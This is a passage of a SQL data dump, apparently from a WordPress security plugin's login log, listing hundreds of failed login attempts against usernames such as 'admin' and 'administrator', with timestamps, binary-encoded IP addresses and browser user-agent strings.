Safari/537.36'),(2622,4778,1628569266.564673,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�_','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(2623,4779,1628570282.022978,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_��[','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(2624,4780,1628571293.998124,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(2625,4782,1628574247.278442,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����#�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(2626,4783,1628575203.812836,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_կ�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(2627,4784,1628576156.517879,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(2628,4785,1628577089.245881,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���=�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(2629,4786,1628578012.183823,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�\'','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(2630,4787,1628578938.967734,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/�=�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(2631,4791,1628586499.546438,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo6','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(2632,4793,1628588433.073962,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(2633,4794,1628589443.318275,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(2634,4795,1628590486.710630,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(2635,4796,1628591512.366927,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����m','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(2636,4797,1628592541.539953,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"E','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(2637,4798,1628593583.297845,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_կ�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(2638,4799,1628595654.537468,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(2639,4800,1628596711.440815,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.est','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(2640,4801,1628597763.310253,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ļ�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2641,4802,1628598769.768195,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(2642,4803,1628599782.830336,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���cr5','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(2643,4804,1628600795.166841,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����p�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(2644,4805,1628602375.000234,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2645,4806,1628602383.422567,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2646,4807,1628602397.277481,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2647,4809,1628606056.905797,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2648,4810,1628606108.431627,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2649,4811,1628606109.314641,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2650,4812,1628608534.793427,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"��}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2651,4813,1628608541.578977,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"��}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2652,4814,1628608544.387626,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"��}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2653,4815,1628609712.509158,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2654,4816,1628609713.552116,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2655,4817,1628609714.562924,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2656,4818,1628613315.698301,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2657,4819,1628613316.888001,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2658,4820,1628613318.931906,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2659,4821,1628616919.994412,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2660,4822,1628616921.901965,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2661,4823,1628616942.514116,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2662,4824,1628620546.932753,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2663,4825,1628620561.377536,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2664,4826,1628620578.537202,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2665,4827,1628624180.378158,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0����$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2666,4844,1628636585.999658,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��)>G','Mozilla/5.0'),(2667,4845,1628636622.977108,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��)>G','Mozilla/5.0'),(2668,4860,1628637353.330644,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��)>��','Mozilla/5.0'),(2669,4872,1628638095.591515,1,'loginFailInvalidUsername','equalitywalk',0,'\0\0\0\0\0\0\0\0\0\0��)>��','Mozilla/5.0'),(2670,4873,1628642586.434240,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(2671,4874,1628642588.130928,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(2672,4875,1628642589.818958,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����u�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(2673,4876,1628643616.311371,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2674,4877,1628643619.765070,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2675,4878,1628643625.211429,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2676,4880,1628647228.430112,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2677,4881,1628647229.532185,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2678,4882,1628647230.619800,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2679,4885,1628659726.847734,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2680,4887,1628661311.837834,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Gf','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2681,4888,1628662108.725522,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E1��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2682,4889,1628662946.489217,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%��r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2683,4892,1628665139.033196,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g#f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2684,4893,1628665867.688231,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2685,4894,1628666518.673701,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2686,4901,1628670008.120401,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���h,I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2687,4902,1628670730.416997,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>�F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2688,4903,1628670870.509532,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2689,4904,1628670872.998153,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2690,4905,1628670875.457408,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(2691,4907,1628672110.538050,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ͱ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2692,4907,1628672110.558057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ͱ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2693,4908,1628672818.499577,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����4S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2694,4911,1628674942.341821,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2695,4912,1628675712.105783,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2696,4922,1628680730.594104,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2697,4923,1628681429.621028,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#7�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2698,4925,1628682920.018874,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2699,4928,1628685801.431821,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-7�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2700,4929,1628686512.742320,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2701,4933,1628689491.033761,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2702,4934,1628690193.012129,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VK�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2703,4935,1628691921.914644,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(2704,4936,1628693560.198255,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����}','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(2705,4943,1628711006.744898,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(2706,4945,1628714149.575903,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����gI','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(2707,4947,1628717305.691910,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�fH','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(2708,4955,1628736888.833481,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(2709,4957,1628741718.640467,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����l','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(2710,4964,1628753611.373339,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2711,4965,1628753993.935631,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"DaF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2712,4966,1628754782.742275,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2713,4967,1628754793.216616,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(2714,4968,1628755137.819873,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2715,4969,1628755542.337370,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2716,4972,1628756480.219113,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4r','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2717,4973,1628756624.309426,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2718,4975,1628757372.212951,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Qٌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2719,4977,1628757880.755552,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2720,4978,1628758172.870109,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ļ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(2721,4979,1628758249.976451,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@v�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2722,4980,1628758618.577195,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����B�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2723,4981,1628758988.936610,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��� �&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2724,4982,1628759365.434123,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.e_A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2725,4983,1628759745.021835,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��xnD','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2726,4984,1628759870.050047,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(2727,4985,1628760115.844940,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����e\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2728,4986,1628760476.660423,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2729,4987,1628760860.252452,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2730,4988,1628761223.103490,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2731,4989,1628761593.016635,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2732,4990,1628761596.512878,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(E��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(2733,4991,1628761963.543210,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2734,4993,1628762731.754604,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2735,4994,1628763092.248041,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�*�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2736,4996,1628763491.092531,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2737,4996,1628763491.125708,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2738,4997,1628763883.182653,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2739,4998,1628764243.814992,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2740,5000,1628765000.283254,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2741,5002,1628765784.715297,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��MD~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2742,5003,1628766152.719515,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Gڿ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2743,5004,1628766534.677465,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\̈�','Mozilla/5.0 (X11; 